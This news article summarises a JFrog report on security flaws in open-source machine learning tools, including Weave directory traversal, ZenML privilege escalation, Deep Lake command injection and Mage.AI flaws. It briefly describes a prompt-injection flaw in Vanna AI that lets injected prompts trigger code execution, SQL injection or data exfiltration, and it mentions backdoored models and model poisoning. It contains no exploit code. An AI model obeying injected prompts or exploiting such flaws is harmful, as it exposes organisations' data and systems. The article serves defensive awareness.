Open source machine learning systems are highly vulnerable to security threats

By James On Dec 22, 2024

MLflow identified as most vulnerable open-source ML platform
Directory traversal errors allow unauthorized access to files in Weave
ZenML Cloud’s access control issues pose privilege escalation risks

A recent analysis of the security landscape of machine learning (ML) frameworks found that ML software is subject to more security vulnerabilities than more mature categories such as DevOps or web servers.

The growing adoption of machine learning across industries underscores the critical need to secure ML systems, as vulnerabilities can lead to unauthorized access, data breaches and compromised operations.

The report from JFrog claims that ML projects like MLflow have seen an increase in critical vulnerabilities. In recent months, JFrog has discovered 22 vulnerabilities in 15 open source ML projects. Of these vulnerabilities, two categories stand out: threats that target server-side components and privilege escalation risks within ML frameworks.

Critical vulnerabilities in ML frameworks

The vulnerabilities identified by JFrog affect key components commonly used in ML workflows, allowing attackers to exploit tools often trusted by ML practitioners for their flexibility to gain unauthorized access to sensitive files or gain privileges within ML environments. increase.

One of the highlighted vulnerabilities concerns Weave, a popular toolkit from Weights & Biases (W&B), which helps track and visualize ML model metrics. The WANDB Weave Directory Traversal vulnerability (CVE-2024-7340) allows low-privilege users to access arbitrary files in the file system.

This flaw occurs due to improper input validation when processing file paths, which could allow attackers to view sensitive files that could contain administrative API keys or other privileged information. Such a breach could lead to privilege escalation, giving attackers unauthorized access to resources and compromising the security of the entire ML pipeline.

ZenML, an MLOps pipeline management tool, is also affected by a critical vulnerability that compromises access control systems. This flaw allows attackers with minimal access to escalate their permissions within ZenML Cloud, a managed implementation of ZenML, giving them access to restricted information, including confidential secrets or model files.

The access control issue in ZenML exposes the system to significant risk as escalated privileges could allow an attacker to manipulate ML pipelines, tamper with model data, or access sensitive operational data, potentially impacting production environments that depend on these pipelines.

Another serious vulnerability, known as the Deep Lake Command Injection (CVE-2024-6507), was found in the Deep Lake database – a data storage solution optimized for AI applications. This vulnerability allows attackers to execute arbitrary commands by abusing the way Deep Lake handles importing external datasets.

Due to improper command sanitization, an attacker could potentially execute code remotely, compromising the security of both the database and any connected applications.

A notable vulnerability was also found in Vanna AI, a tool designed for generating and visualizing natural language SQL queries. The Vanna.AI Prompt Injection (CVE-2024-5565) allows attackers to inject malicious code into SQL prompts, which the tool then processes. This vulnerability, which could lead to remote code execution, allows malicious actors to target Vanna AI’s SQL-to-Graph visualization feature to manipulate visualizations, perform SQL injections, or exfiltrate data.

Mage.AI, an MLOps tool for managing data pipelines, is found to have multiple vulnerabilities, including unauthorized shell access, arbitrary file leaks, and weak path checks.

These issues allow attackers to gain control of data pipelines, expose sensitive configurations, or even execute malicious commands. The combination of these vulnerabilities poses a high risk of privilege escalation and data integrity breaches, compromising the security and stability of ML pipelines.

By gaining administrative access to ML databases or registries, attackers can embed malicious code into models, leading to backdoors that are activated when the model is loaded. This can compromise downstream processes as the models are used by different teams and CI/CD pipelines. The attackers can also exfiltrate sensitive data or perform model poisoning attacks to degrade model performance or manipulate output.

JFrog’s findings highlight an operational gap in MLOps security. Many organizations lack robust integration of AI/ML security practices with broader cybersecurity strategies, creating potential blind spots. As ML and AI continue to drive significant advancements in the industry, protecting the frameworks, datasets, and models that fuel these innovations becomes paramount.